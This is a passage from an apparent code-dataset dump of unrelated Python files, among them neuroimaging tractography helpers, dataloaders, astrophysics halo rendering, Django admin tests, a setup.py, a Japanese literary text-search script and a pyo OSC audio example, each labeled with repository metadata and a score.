sh2peaks.add_arg(arg=out_folder + 'odf_' + csd_algo + '_0_mrtrix.nii.gz', check_input=True)
sh2peaks.add_arg(arg=out_folder + 'peaks_' + csd_algo + '_0_mrtrix.nii.gz', check_output=True)
sh2peaks.add_arg('-threshold', 0.1)
sh2peaks.run(version_arg='--version')
flipper = CmdInterface('MitkFlipPeaks')
flipper.add_arg('-i', out_folder + 'peaks_' + csd_algo + '_0_mrtrix.nii.gz', check_input=True)
flipper.add_arg('-o', out_folder + 'peaks_' + csd_algo + '_0_flipped_mrtrix.nii.gz', check_output=True)
flipper.add_arg('-z')
flipper.run()
@staticmethod
def track_streamline(input_image: str,
out_folder: str,
algo: str,
num_streamlines: int,
cutoff: float = 0.1,
minlength: int = 30,
maxlength: int = 200,
step: float = None,
angle: float = None):
""" Perform MRtrix streamline tractography.
"""
os.makedirs(out_folder, exist_ok=True)
tracts = out_folder + os.path.basename(input_image).split('.')[0] + '_' + algo + '_mrtrix'
tckgen = CmdInterface('tckgen')
tckgen.add_arg(arg=input_image, check_input=True)
if algo == 'Tensor_Det' or algo == 'Tensor_Prob':
print(algo + ' NOT IMPLEMENTED')
exit()
tckgen.add_arg(key='-fslgrad',
arg=[input_image.replace('.nii.gz', '.bvecs'), input_image.replace('.nii.gz', '.bvals')])
tckgen.add_arg(arg=tracts + '.tck', check_output=True)
tckgen.add_arg('-algorithm', algo)
tckgen.add_arg('-seed_dynamic', input_image)
tckgen.add_arg('-nthreads', 12)
tckgen.add_arg('-select', num_streamlines)
tckgen.add_arg('-minlength', minlength)
tckgen.add_arg('-maxlength', maxlength)
tckgen.add_arg('-cutoff', cutoff)
if step is not None:
tckgen.add_arg('-step', step)
if angle is not None:
tckgen.add_arg('-angle', angle)
tckgen.add_arg('-force')
tckgen.run(version_arg='--version')
postproc = CmdInterface('MitkFiberProcessing')
postproc.add_arg('-i', tracts + '.tck', check_input=True)
postproc.add_arg('--compress', 0.1)
postproc.add_arg('-o', tracts + '.trk', check_output=True)
postproc.run()
return tracts + '.trk'
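
# Hypothetical usage sketch (paths and parameter values are placeholders, not taken
# from the original repository):
#
#     odf = MitkTrackingHelper.recon_qball('dwi.nii.gz', 'out/', sh_order=4,
#                                          do_flip_bvecs=True)
#     tensors = MitkTrackingHelper.recon_tensor('dwi.nii.gz', 'out/')
#     fods = MRtrixTrackingHelper.recon_csd('dwi.nii.gz', do_flip_bvecs=True,
#                                           out_folder='out/')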
| 1.664063 | 2 |
pulsar/async/_subprocess.py | PyCN/pulsar | 1,410 | 39940 |
if __name__ == '__main__':
import sys
import pickle
from multiprocessing import current_process
from multiprocessing.spawn import import_main_path
data = pickle.load(sys.stdin.buffer)
current_process().authkey = data['authkey']
sys.path = data['path']
import_main_path(data['main'])
impl = pickle.loads(data['impl'])
from pulsar.async.concurrency import run_actor
run_actor(impl)
| 0.679688 | 1 |
dataloader/stereo_kittilist15.py | ne3x7/VCN | 148 | 40068 | <reponame>ne3x7/VCN
import torch.utils.data as data
import pdb
from PIL import Image
import os
import os.path
import numpy as np
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
]
def is_image_file(filename):
return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)
def dataloader(filepath, typ = 'train'):
left_fold = 'image_2/'
right_fold = 'image_3/'
disp_L = 'disp_occ_0/'
disp_R = 'disp_occ_1/'
image = [img for img in os.listdir(filepath+left_fold) if img.find('_10') > -1]
image = sorted(image)
imglist = [1,3,6,20,26,35,38,41,43,44,49,60,67,70,81,84,89,97,109,119,122,123,129,130,132,134,141,144,152,158,159,165,171,174,179,182, 184,186,187,196]
if typ == 'train':
train = [image[i] for i in range(200) if i not in imglist]
elif typ == 'trainval':
train = [image[i] for i in range(200)]
val = [image[i] for i in imglist]
left_train = [filepath+left_fold+img for img in train]
right_train = [filepath+right_fold+img for img in train]
disp_train_L = [filepath+disp_L+img for img in train]
#disp_train_R = [filepath+disp_R+img for img in train]
left_val = [filepath+left_fold+img for img in val]
right_val = [filepath+right_fold+img for img in val]
disp_val_L = [filepath+disp_L+img for img in val]
#disp_val_R = [filepath+disp_R+img for img in val]
return left_train, right_train, disp_train_L, left_val, right_val, disp_val_L
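
# Illustrative usage (the path below is a placeholder; note that filepath is
# concatenated directly with the sub-folder names, so it should end with '/'):
#
#     left_train, right_train, disp_train_L, left_val, right_val, disp_val_L = \
#         dataloader('/data/KITTI2015/training/', typ='train')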
| 2.1875 | 2 |
pyHalo/Rendering/two_halo.py | DarthLazar/pyHalo | 7 | 40196 | from pyHalo.Rendering.SpatialDistributions.uniform import LensConeUniform
import numpy as np
from copy import deepcopy
from pyHalo.Rendering.MassFunctions.power_law import GeneralPowerLaw
from pyHalo.Rendering.rendering_class_base import RenderingClassBase
class TwoHaloContribution(RenderingClassBase):
"""
This class adds correlated structure associated with the host dark matter halo. The amount of structure added is
proportional to b * corr, where b is the halo bias as computed by Sheth and Tormen (1999) and corr is the
matter-matter correlation function. Currently, this term is implemented as a rescaling of the background density by
b * corr, where the product is the average value computed over 2*dz, where dz is the spacing of the redshift planes
adjacent the redshift plane of the main deflector.
"""
def __init__(self, keywords_master, halo_mass_function, geometry, lens_cosmo, lens_plane_redshifts, delta_z_list):
self._rendering_kwargs = self.keyword_parse_render(keywords_master)
self.halo_mass_function = halo_mass_function
self.geometry = geometry
self.lens_cosmo = lens_cosmo
self.spatial_distribution_model = LensConeUniform(keywords_master['cone_opening_angle'], geometry)
self._lens_plane_redshifts = lens_plane_redshifts
self._delta_z_list = delta_z_list
super(TwoHaloContribution, self).__init__()
def render(self):
"""
Generates halo masses and positions for correlated structure around the main deflector
:return: mass (in Msun), x (arcsec), y (arcsec), r3d (kpc), redshift
"""
idx = np.argmin(abs(np.array(self._lens_plane_redshifts) - self.lens_cosmo.z_lens))
delta_z = self._delta_z_list[idx]
m = self.render_masses_at_z(self.lens_cosmo.z_lens, delta_z)
x, y = self.render_positions_at_z(self.lens_cosmo.z_lens, len(m))
subhalo_flag = [False] * len(m)
redshifts = [self.lens_cosmo.z_lens] * len(m)
r3d = np.array([None] * len(m))
return m, x, y, r3d, redshifts, subhalo_flag
def render_masses_at_z(self, z, delta_z):
"""
:param z: redshift at which to render masses
:param delta_z: thickness of the redshift slice
:return: halo masses at the desired redshift in units Msun
"""
norm, slope = self._norm_slope(z, delta_z)
args = deepcopy(self._rendering_kwargs)
log_mlow, log_mhigh = self._redshift_dependent_mass_range(z, args['log_mlow'], args['log_mhigh'])
mfunc = GeneralPowerLaw(log_mlow, log_mhigh, slope, args['draw_poisson'],
norm, args['log_mc'], args['a_wdm'], args['b_wdm'],
args['c_wdm'])
m = mfunc.draw()
return m
def render_positions_at_z(self, z, nhalos):
"""
:param z: redshift
:param nhalos: number of halos or objects to generate
:return: the x, y coordinate of objects in arcsec, and a 3 dimensional coordinate in kpc
        The 3d coordinate only has a clear physical interpretation for subhalos, and is used to compute truncation radii.
For line of sight halos it is set to None.
"""
x_kpc, y_kpc = self.spatial_distribution_model.draw(nhalos, z)
if len(x_kpc) > 0:
kpc_per_asec = self.geometry.kpc_per_arcsec(z)
x_arcsec = x_kpc * kpc_per_asec ** -1
y_arcsec = y_kpc * kpc_per_asec ** -1
return x_arcsec, y_arcsec
else:
return np.array([]), np.array([])
def _norm_slope(self, z, delta_z):
"""
This method computes the normalization of the mass function for correlated structure around the main deflector.
The normalization is defined as (boost - 1) * background, where background is the mean normalization of the
halo mass function computed with (for example) Sheth-Tormen, and boost is the average contribution of the
two-halo term integrated over a comoving distance corresponding to 2 * dz, where dz is the redshift plane
spacing.
        boost(z, r_min, r_max) = 2 / r_max * int_{r_min}^{r_max} xi(r, z, M_host) dr
        where xi(r, z, M_host) is the linear halo bias times the matter-matter correlation function,
        r_min is set to 0.5 Mpc, and r_max is the comoving distance corresponding to 2*dz, where dz is the redshift
spacing. M_host is the mass in M_sun of the host dark matter halo
:param z: the redshift which to evaluate the matter-matter correlation function and halo bias
:param delta_z: the redshift spacing of the lens planes adjacent the main deflector
:return: the normalization of the two-halo term mass function. The form of the two-halo term mass function is
assumed to have the same shape as the background halo mass function
"""
if z != self.lens_cosmo.z_lens:
raise Exception('this class must be evaluated at the main deflector redshift')
volume_element_comoving = self.geometry.volume_element_comoving(z, delta_z)
plaw_index = self.halo_mass_function.plaw_index_z(z) + self._rendering_kwargs['delta_power_law_index']
norm_per_unit_volume = self.halo_mass_function.norm_at_z_density(z, plaw_index,
self._rendering_kwargs['m_pivot'])
norm_per_unit_volume *= self._rendering_kwargs['LOS_normalization']
reference_norm = norm_per_unit_volume * volume_element_comoving
rmax = self.lens_cosmo.cosmo.D_C_transverse(z + delta_z) - self.lens_cosmo.cosmo.D_C_transverse(z)
rmin = min(rmax, 0.5)
two_halo_boost = self.halo_mass_function.two_halo_boost(self._rendering_kwargs['host_m200'], z, rmax=rmax,
rmin=rmin)
slope = self.halo_mass_function.plaw_index_z(z) + self._rendering_kwargs['delta_power_law_index']
norm = (two_halo_boost - 1) * reference_norm
return norm, slope
def convergence_sheet_correction(self, *args, **kwargs):
return {}, [], []
@staticmethod
def keyword_parse_render(keywords_master):
kwargs = {}
required_keys = ['log_mlow', 'log_mhigh', 'host_m200', 'LOS_normalization',
'draw_poisson', 'delta_power_law_index', 'm_pivot', 'log_mc', 'a_wdm', 'b_wdm', 'c_wdm']
for key in required_keys:
if key not in keywords_master:
raise Exception('Required keyword argument ' + str(key) + ' not specified.')
else:
kwargs[key] = keywords_master[key]
return kwargs
def keys_convergence_sheets(self):
return {}
| 1.898438 | 2 |
vidaug/augmentors/__init__.py | redzhepdx/vidaug | 1 | 40324 | from __future__ import absolute_import
from .affine import *
from .crop import *
from .flip import *
from .geometric import *
from .group import *
from .intensity import *
from .temporal import *
| 0.482422 | 0 |
data_pipeline/sql/statement/ddl_statement.py | albertteoh/data_pipeline | 0 | 40452 | ###############################################################################
# Module: ddl_statement
# Purpose: Parent class for DDL (Data Definition Language) statements
#
# Notes:
#
###############################################################################
import data_pipeline.constants.const as const
from abc import ABCMeta, abstractmethod
from .base_statement import BaseStatement
class DdlStatement(BaseStatement):
"""Contains data necessary for producing a valid DDL statement"""
__metaclass__ = ABCMeta
def __init__(self, table_name):
super(DdlStatement, self).__init__(table_name)
self._entries = []
@property
def entries(self):
return self._entries
@abstractmethod
def add_entry(self, **kwargs):
pass
def _build_field_params(self, params):
if params:
return "({})".format(const.COMMASPACE.join(params))
return const.EMPTY_STRING
def _build_field_string(self, value):
return " {}".format(value if value else const.EMPTY_STRING)
| 2.21875 | 2 |
33. Python Programs/FactorialOfNumbers.py | Ujjawalgupta42/Hacktoberfest2021-DSA | 225 | 40580 | <reponame>Ujjawalgupta42/Hacktoberfest2021-DSA
for i in range(int(input())):
fact=1
a=int(input())
for j in range(1,a+1,1):
fact=fact*j
print(fact)
def factorial(n):
return 1 if (n==1 or n==0) else n * factorial(n - 1);
num = int(input('Enter number'))
print("Factorial of",num,"is",
factorial(num))
| 2.625 | 3 |
accountsplus/tests/test_admin.py | GhalebKhaled/django-users-plus | 3 | 40708 | <reponame>GhalebKhaled/django-users-plus
from __future__ import unicode_literals
import django.test
import django.contrib.admin
import logging
from .. import admin
from test_models import (UnitTestCompany, UnitTestUser, UnitTestAuditLogEvent, )
logging.disable(logging.CRITICAL)
@django.contrib.admin.register(UnitTestCompany)
class UnitTestCompanyAdmin(admin.BaseCompanyAdmin):
pass
@django.contrib.admin.register(UnitTestUser)
class UnitTestUserAdmin(admin.BaseUserAdmin):
pass
@django.contrib.admin.register(UnitTestAuditLogEvent)
class UnitTestAuditLogEventAdmin(admin.BaseAuditLogEventAdmin):
pass
| 1.164063 | 1 |
main.py | Grimmaldi/supergoaltracker | 0 | 40836 | from app import app
if __name__ == '__main__':
app = app.Session() | 0.421875 | 0 |
abc_097_b.py | YukiShinonome/AtCoder | 0 | 40964 | <filename>abc_097_b.py
X = int(input())
a_list = []
for s in range(1, 32):
for i in range(2, 10):
a = s ** i
if a > 1000:
break
a_list.append(a)
a2 = sorted(list(set(a_list)), reverse=True)
for n in a2:
if n <= X:
print(n)
break | 2.09375 | 2 |
setup.py | KevinMusgrave/pytorch-adapt | 131 | 41092 | import sys
import setuptools
sys.path.insert(0, "src")
import pytorch_adapt
with open("README.md", "r") as fh:
long_description = fh.read()
extras_require_ignite = ["pytorch-ignite == 0.5.0.dev20220221"]
extras_require_lightning = ["pytorch-lightning"]
extras_require_record_keeper = ["record-keeper >= 0.9.31"]
extras_require_timm = ["timm"]
extras_require_docs = [
"mkdocs-material",
"mkdocstrings[python]",
"griffe",
"mkdocs-gen-files",
"mkdocs-section-index",
"mkdocs-literate-nav",
]
extras_require_dev = ["black", "isort", "nbqa", "flake8"]
setuptools.setup(
name="pytorch-adapt",
version=pytorch_adapt.__version__,
author="<NAME>",
description="Domain adaptation made easy. Fully featured, modular, and customizable.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/KevinMusgrave/pytorch-adapt",
package_dir={"": "src"},
packages=setuptools.find_packages(where="src"),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.0",
install_requires=[
"numpy",
"torch",
"torchvision",
"torchmetrics",
"pytorch-metric-learning >= 1.3.1.dev0",
],
extras_require={
"ignite": extras_require_ignite,
"lightning": extras_require_lightning,
"record-keeper": extras_require_record_keeper,
"timm": extras_require_timm,
"docs": extras_require_docs,
"dev": extras_require_dev,
},
)
| 1.15625 | 1 |
data processing/create_word2vec_input.py | RayL0707/Finance_KG | 0 | 41220 | <gh_stars>0
import json
import thulac
import time
# n
# all+n (where "all" does not include vm)
# a+n
# np  person name
# ns  place name
# ni  organization name
# nz  other proper noun
# t and r (time words and pronouns) need not be added at this step, but should be considered for named entity recognition (note)
# i  idiom
# j  abbreviation
# x  other
# must not contain punctuation (w)
def nowok(s):  # part-of-speech filter for the current word
if s=='n' or s=='np' or s=='ns' or s=='ni' or s=='nz':
return True
if s=='i' or s=='j' or s=='x' or s=='id' or s=='g' or s=='t':
return True
if s=='t' or s=='m':
return True
return False
def judge(s):  # discard words containing characters other than Chinese, English letters, or digits
num_count = 0
for ch in s:
if u'\u4e00' <= ch <= u'\u9fff':
pass
elif '0' <= ch <= '9':
num_count += 1
pass
elif 'a' <= ch <= 'z':
pass
elif 'A' <= ch <= 'Z':
pass
else:
return False
    if num_count == len(s):  # if the word is purely numeric, discard it
return False
return True
# Given a segmentation result, extract named entities (NER)
def createWordList(x):
i = 0
n = len(x)
L = []
while i < n:
if judge(x[i][0]) == False :
i += 1
continue;
if nowok(x[i][1]):
L.append(x[i][0])
i += 1
return L
def createTable(num):
start = time.time()
thu = thulac.thulac()
file = open('agri_economic.json', encoding='utf-8')
print("begin!")
f = json.load(file)
count = 0
file_text = ""
for p in f:
count += 1
if int(count/100) != num:
continue
if count % 10 == 0:
cur = time.time()
print("now id : " + str(count) + " table size :" )
print("Running Time : " + str(int(cur-start)) + " s......")
detail = p['detail']
# if len(detail) > 600:
# detail = detail[0:600]
title = p['title']
        # word segmentation
text = thu.cut(detail)
wordList = createWordList(text)
file_text += title
for word in wordList:
file_text += ' ' + word
file_text += '\n'
file_object = open('article'+str(num)+".txt",'w')
file_object.write(file_text)
file_object.close()
createTable(0)
#createTable(1)
#createTable(2)
#createTable(3)
#createTable(4)
#createTable(5)
#createTable(6)
#createTable(7)
#createTable(8)
#createTable(9)
#test()
#def test():
# thu = thulac.thulac()
# detail = "指在干旱、半干旱地区依靠自然降水栽培小麦。"
# text = thu.cut(detail)
# for x in text:
# print(x[1])
#
| 2.21875 | 2 |
sql.py | saidul-islam-tuhin/Computer-Assistant-With-Bilingual-Voice-Commands | 0 | 41348 | ##−∗−coding : utf−8−∗−
import sqlite3 as lite
import logging
import sys
from collections import OrderedDict
import conf
LOG_FORMAT = "%(levelname)s > Line:%(lineno)s - %(message)s"
logging.basicConfig(filename="debug.log",
level=logging.DEBUG,
format=LOG_FORMAT,
filemode="w",
)
logger = logging.getLogger(__name__)
# encode: string -> byte
# unicode.encode() -> bytes
# decode: bytes -> string
# bytes.decode() -> unicode
# no need to encoding or decode
def decode_to_text(text):
if isinstance(text, str):
print(text)
if "সময়" == text:
logger.debug(str(text.encode('utf-8')))
logger.debug(str("সময়".encode('utf-8')))
logger.debug(str("সময়".encode('utf-8')))
# decode_text = text.encode('utf-8').decode('utf-8')
decode_text = text
else:
decode_text = text
return decode_text
def convert_into_dic(columns, rows):
"""
Return query value into dictionary
:type columns: list
:type rows: tuple
"""
column_name = None
row_val = None
query_val = OrderedDict()
length_c = len(columns)
for c in range(0,length_c):
column_name = columns[c]
query_val[column_name] = [] # create key name with empty list value
for r in range(0,len(rows)):
row_val = decode_to_text(rows[r][c])
query_val[column_name].append(row_val)
return query_val
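# Illustrative example: convert_into_dic(['id', 'name'], [(1, 'a'), (2, 'b')])
# returns OrderedDict([('id', [1, 2]), ('name', ['a', 'b'])]).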
def run_query(query):
"""
Return query result
sql: rawstring of sql
"""
con = None
data = None
try:
con = lite.connect('VoiceCommand.db')
cur = con.cursor()
cur.execute(query)
# TODO: Simplified it
if True in map(lambda x: x.lower() in query.lower(),['update','insert','delete']):
conf.NEW_COMMAND = True
data = cur.fetchall()
print(data)
if cur.description:
column_name = [c[0] for c in cur.description]
if data:
data = convert_into_dic(column_name, data)
con.commit()
except lite.Error as e:
print("Error {}:".format(e.args[0]))
sys.exit(1)
finally:
if con:
con.close()
return data
| 1.757813 | 2 |
venv/Lib/site-packages/pyo/examples/17-osc/02-receive-streams.py | mintzer/pupillometry-rf-back | 0 | 41476 | """
Receiving Open Sound Control messages as audio streams
**02-receive-streams.py**
This script shows a granulation process controlled by OSC messages
coming from another program (run the next example, *03-send-streams.py*,
to get values coming in).
"""
from pyo import *
s = Server().boot()
# The sound table to granulate.
table = SndTable("../snds/flute.aif")
# Listen addresses '/density', '/position', '/pitch_rand' and '/duration' on port 9000.
rec = OscReceive(port=9000, address=["/density", "/position", "/pitch_rand", "/duration"])
# Sets initial values for the OSC streams. This allows the program to run with
# minimal behaviour even if no messages have been sent on these addresses.
rec.setValue("/density", 0.5)
rec.setValue("/position", 0.5)
rec.setValue("/pitch_rand", 0.0)
rec.setValue("/duration", 0.5)
# Density of grains, between 1 and 250 grains per second.
dens = SigTo(rec["/density"], time=0.05, mul=249, add=1)
# Reading position, in samples, in the table + little jitter noise.
pos = SigTo(rec["/position"], time=0.05, mul=table.getSize(), add=Noise(100))
# Amplitude of a jitter noise around 1.0 to control the pitch of individual grains.
rpit = SigTo(rec["/pitch_rand"], time=0.05, mul=0.2, add=0.001)
pit = Noise(mul=rpit, add=1)
# Grain duration, between 0.025 and 0.5 second.
dur = SigTo(rec["/duration"], time=0.05, mul=0.475, add=0.025)
grain = Particle(
table=table, # table to read samples from.
env=HannTable(), # grain envelope.
dens=dens, # density of grains per second.
pitch=pit, # pitch of grains.
pos=pos, # position in the table where to start the grain.
dur=dur, # grain duration.
dev=0.01, # Maximum deviation of the starting time of the grain.
pan=Noise(0.5, 0.5), # Panning factor of the grain.
chnls=2, # Number of channels to output.
mul=0.15,
).out()
s.gui(locals())
| 1.804688 | 2 |
solutions/solved008.py | pedraodeveloper66/Najma | 0 | 41604 | <gh_stars>0
"""
Write a program that reads a value in meters and displays it converted to centimeters and millimeters
"""
m = float(input('Uma distância em metros: '))
"""Kilometre --> Divide the length value by 1000"""
km = m / 1000
"""Hectometre --> Divide the length value by 100"""
hm = m / 100
"""Decametre --> Divide the length value by 10"""
dam = m / 10
"""Decimetre --> Multiply the length value by 10"""
dm = m * 10
"""Centimetre --> Multiply the length value by 100"""
cm = m * 100
"""Millimetre --> Multiply the length value by 1000"""
mm = m * 1000
print('A medida de {}m corresponde a\n{}km\n{}hm\n{}dam\n{}dm\n{}cm\n{}mm'.format(m, km, hm, dam, dm, cm, mm))
| 3.25 | 3 |
polls/application/bungou.py | jphacks/B_2015 | 0 | 41732 | <gh_stars>0
# The following is mostly copy-pasted from Ayaka
"""import requests
headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36'}
url_1 = 'https://www.aozora.gr.jp/cards/000035/files/301_ruby_5915.zip'
url_2 = 'https://www.aozora.gr.jp/cards/000035/files/1565_ruby_8220.zip'
url_3 = 'https://www.aozora.gr.jp/cards/000035/files/1567_ruby_4948.zip'
url_4 = 'https://www.aozora.gr.jp/cards/000035/files/1569_ruby_18584.zip'
url_5 = 'https://www.aozora.gr.jp/cards/000035/files/270_ruby_1164.zip'
r_1 = requests.get(url_1, headers= headers)
r_2 = requests.get(url_2, headers= headers)
r_3 = requests.get(url_3, headers= headers)
r_4 = requests.get(url_4, headers= headers)
r_5 = requests.get(url_5, headers= headers)
content_1 = r_1.content
content_2 = r_2.content
content_3 = r_3.content
content_4 = r_4.content
content_5 = r_5.content
import io
import zipfile
f_1 = io.BytesIO(content_1)
f_2 = io.BytesIO(content_2)
f_3 = io.BytesIO(content_3)
f_4 = io.BytesIO(content_4)
f_5 = io.BytesIO(content_5)
zipf_1 = zipfile.ZipFile(f_1)
zipf_2 = zipfile.ZipFile(f_2)
zipf_3 = zipfile.ZipFile(f_3)
zipf_4 = zipfile.ZipFile(f_4)
zipf_5 = zipfile.ZipFile(f_5)
namelist_1 = zipf_1.namelist()
namelist_2 = zipf_2.namelist()
namelist_3 = zipf_3.namelist()
namelist_4 = zipf_4.namelist()
namelist_5 = zipf_5.namelist()
namelist_1
namelist_2
namelist_3
namelist_4
namelist_5
import re
title = ''
author = ''
def syori(text,first_sentence,last_sentence):
#title, text = text.split('【テキスト中に現れる記号について】')
#print(title)
_, text = text.split(first_sentence)
text, _ = text.split(last_sentence)
text = first_sentence + text + last_sentence
text = text.replace('|', '').replace(' ', '')
text = re.sub('《\w+》', '', text)
text = re.sub('[#.*]','', text)
text = text.replace('\r','').replace('\n','')
text = re.sub('[、「」?]', '', text)
text = re.sub('\(\w+\)', '', text)
text = re.sub('\[\w+\]', '', text)
text = re.sub('[ \t]+$','',text)
text = re.sub('^[ \t]+$','',text)
text = re.sub('^ +$','',text)
text = re.sub('[ ]+','',text)
text = text.split('。')
return text
#info = {}
def make_info(btext,atext):
list = btext.splitlines()
#print(list[0])
#print(list[1])
#print(btext[:10])
#print('\n')
#print(atext[:10])
info={}
for sentence in atext:
#print(sentence)
info[sentence]=list[:2]
return info
print("loading......")
###########################################
data_1 = zipf_1.read(namelist_1[0])
original_text_1 = data_1.decode('Shift_JIS')
#print(original_text_1[:500])
#title, _ = original_text_1.split('【テキスト中に現れる記号について】')
#title, _ = title.split('-------------------------------------------------------')
#list = title.splitlines()
#print(list[1])
#print(text)
#sentences_1 = text.split('。')
first_sentence = '私は、その男の写真を三葉、見たことがある。'
last_sentence = '神様みたいないい子でした'
sentences_1 = syori(original_text_1,first_sentence,last_sentence)
info = make_info(original_text_1,sentences_1)
# print('文の数:', len(sentences_1))
# print(sentences_1[:10])
#print(info['私は、その男の写真を三葉、見たことがある。'])
#print(info)
###########################################
data_2 = zipf_2.read(namelist_2[0])
original_text_2 = data_2.decode('Shift_JIS')
#print(original_text[:500])
first_sentence = '朝、食堂でスウプを一さじ、すっと吸ってお母さまが、'
last_sentence = 'ぜひお聞きいれのほど願います。'
#print(text)
sentences_2 = syori(original_text_2,first_sentence,last_sentence)
# print('文の数:', len(sentences_2))
#print(type(sentences_1[0]))
# print(sentences_2[:10])
info.update(make_info(original_text_2,sentences_2))
#print(type(text))
#print(info)
##########################################
data_3 = zipf_3.read(namelist_3[0])
original_text_3 = data_3.decode('Shift_JIS')
#print(original_text[:500])
first_sentence = 'メロスは激怒した。必ず、'
last_sentence = '勇者は、ひどく赤面した。'
#print(text)
sentences_3 = syori(original_text_3,first_sentence,last_sentence)
# print('文の数:', len(sentences_3))
#print(type(sentences_1[0]))
# print(sentences_3[:10])
# print(type(sentences_3[0]))
info.update(make_info(original_text_3,sentences_3))
##########################################
data_4 = zipf_4.read(namelist_4[0])
original_text_4 = data_4.decode('Shift_JIS')
#print(original_text[:500])
first_sentence = '伊豆の南、温泉が湧き出ているというだけで、他には何一つとるところの無い、つまらぬ山村である。'
last_sentence = '何をしている事やら。'
sentences_4 = syori(original_text_4,first_sentence,last_sentence)
# print('文の数:', len(sentences_4))
#print(type(sentences_1[0]))
# print(sentences_4[:10])
#print(type(text))
info.update(make_info(original_text_4,sentences_4))
##########################################
data_5 = zipf_5.read(namelist_5[0])
original_text_5 = data_5.decode('Shift_JIS')
#print(original_text[:500])
first_sentence = '富士の頂角、広重《ひろしげ》の富士は八十五度、文晁《ぶんてう》の富士も八十四度くらゐ、'
last_sentence = '酸漿《ほほづき》に似てゐた。'
#print(text)
sentences_5 = syori(original_text_5,first_sentence,last_sentence)
# print('文の数:', len(sentences_5))
#print(type(sentences_1[0]))
# print(sentences_5[:10])
#print(type(text))
sentences_list = [sentences_1,sentences_2,sentences_3,sentences_4,sentences_5]
# print(type(sentences_list))
info.update(make_info(original_text_5,sentences_5))
####################################################################
# wondering whether this part is better left out of a function... still not sure how views works
from janome.tokenizer import Tokenizer
BEGIN = '__BEGIN__'
END = '__END__'
#after_list = []
t = Tokenizer()
gokan_dict={}
for sentences in sentences_list:
for sentence in sentences:
for gokan in [token.base_form for token in t.tokenize(sentence)]:
if gokan_dict.get(gokan)==None:
gokan_dict[gokan]=[sentence]
else:
gokan_dict[gokan].append(sentence)
class pycolor:
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
PURPLE = '\033[35m'
CYAN = '\033[36m'
WHITE = '\033[37m'
    RETURN = '\033[07m' # reverse video
    ACCENT = '\033[01m' # bold
    FLASH = '\033[05m' # blink
    RED_FLASH = '\033[05;41m' # red background + blink
END = '\033[0m'
import os
import csv
def search(param):
# param = input()
from dictionary import make_synonym_dict
synonym_dict = {}
synonym_dict=make_synonym_dict(param)
datas = []
for synonym in synonym_dict[param]:
if gokan_dict.get(synonym):
for sentence in gokan_dict[synonym]:
words=t.tokenize(sentence)
words=list(words)
#b=False
#text1 = ""
#text2 = ""
for word in words:
if word.base_form==synonym:
#b=True
param2=word.surface
text_list = sentence.split(word.surface)
break
datas.append(text_list[0]+param2+text_list[1]+':'+info[sentence][0]+','+info[sentence][1])
# 色付き datas.append(text_list[0]+pycolor.BLUE+param2+pycolor.END+text_list[1]+':'+info[sentence][0]+','+info[sentence][1])
# print(text_list[0]+pycolor.BLUE+param2+pycolor.END+text_list[1]+':'+info[sentence][0]+','+info[sentence][1])
with open(os.getcwd()+'/polls/application/'+'data.csv','a') as f:
writer = csv.writer(f, lineterminator='\n,')
writer.writerow(datas)
        # writer.writerow("DONE")
import os
import csv
import random
#from dictionary import make_synonym_dict
def search(param):
#from janome.tokenizer import Tokenizer
#t = Tokenizer()
#print(param2)
print("search:")
print(param)
def flatten(nested_list):
"""2重のリストをフラットにする関数"""
return [e for inner_list in nested_list for e in inner_list]
def search2(param):
param2 = '"' + param + '":'
gokan_sentence_list = []
print(os.getcwd())
with open(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'akutagawa_gokan_dict.tsv', encoding = 'utf-8')as f:
print("開けた!")
for line in f:
#print(line)
#t = 0
if param2 in line:
_,line = line.split(param2)
gokan_sentence_list = line.split('\t')
#t = random.randint(0,len(gokan_sentence_list)-1)
break
print(gokan_sentence_list)
print("aaa")
if gokan_sentence_list!=[]:
return random.choice(gokan_sentence_list)
else:
return ""
gokan_sentence_list = []
gokan_sentence_list.append(search2(param))
#print(gokan_dict)
synonym_dict = {}
#synonym_dict=make_synonym_dict(param)
#print(synonym_dict)
with open(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'akutagawa_synonym_dict.tsv', encoding = 'utf-8')as f:
param2 = '"'+param+'":'
for line in f:
if param2 in line:
_,line = line.split(param2)
synonym_dict[param] = line.split('\t')
for synonym in synonym_dict[param]:
#print(synonym)
gokan_sentence_list.append(search2(synonym))
#if gokan_dict.get(synonym):
#for sentence in gokan_sentence_list:
with open(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'data.csv','a') as f:
for sentence in gokan_sentence_list:
f.write(sentence + '::::::::::')
#writer.writerow(gokan_sentence_list)
        # writer.writerow("DONE")
# 以下を追記(return_text()を呼び出すと"Hello!!"が返される)
def return_text():
#return "Hello!"
with open(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'data.csv') as f:
reader = csv.reader(f, lineterminator='\n,')
datas = []
for row in reader:
# print(row)
datas.append(row)
os.remove(os.getcwd()+'/sitm.pythonanywhere.com/polls/application/'+'data.csv')
return datas
"""
with open(os.getcwd()+'/polls/application/'+'data.csv','a') as f:
reader = csv.reader(f, lineterminator='\n')
datas = []
for row in reader:
datas.append(row)
return datas
"""
"""
For testing
# coding:utf-8
import os
import csv
# record the data sent from the html form into a csv file
def search(data):
print("dataだよ")
datas = [data]
with open(os.getcwd()+'/polls/application/'+'data.csv','a') as f:
writer = csv.writer(f, lineterminator='\n')
writer.writerow(datas)
""" | 1.226563 | 1 |
cea/plots/optimization/pareto_capacity_installed.py | pajotca/CityEnergyAnalyst | 1 | 41860 | <reponame>pajotca/CityEnergyAnalyst<filename>cea/plots/optimization/pareto_capacity_installed.py
from __future__ import division
from __future__ import print_function
import plotly.graph_objs as go
from plotly.offline import plot
from cea.plots.variable_naming import LOGO, COLOR, NAMING
def pareto_capacity_installed(data_frame, analysis_fields, title, output_path):
# CALCULATE GRAPH
traces_graph = calc_graph(analysis_fields, data_frame)
